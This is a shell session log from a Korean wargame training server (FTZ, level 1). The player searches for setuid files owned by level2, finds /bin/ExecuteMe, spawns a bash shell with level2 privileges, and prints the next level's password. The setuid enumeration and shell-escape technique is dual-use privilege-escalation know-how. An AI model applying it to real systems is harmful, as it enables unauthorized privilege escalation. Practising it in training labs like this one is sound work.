login as: level1
level1@192.168.35.100's password:
[level1@ftz level1]$ ll
total 12
-rw-r--r--    1 root     root           47 Apr  4  2000 hint
drwxr-xr-x    2 root     level1       4096 Dec  7  2003 public_html
drwxrwxr-x    2 root     level1       4096 Jan 16  2009 tmp
[level1@ftz level1]$ cat hint


level2 권한에 setuid가 걸린 파일을 찾는다.


[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null
/bin/ExecuteMe
[level1@ftz level1]$ /bin/ExecuteMe



                레벨2의 권한으로 당신이 원하는 명령어를
                한가지 실행시켜 드리겠습니다.
                (단, my-pass 와 chmod는 제외)

                어떤 명령을 실행시키겠습니까?


                [level2@ftz level2]$ bash


[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".

[level2@ftz level2]$
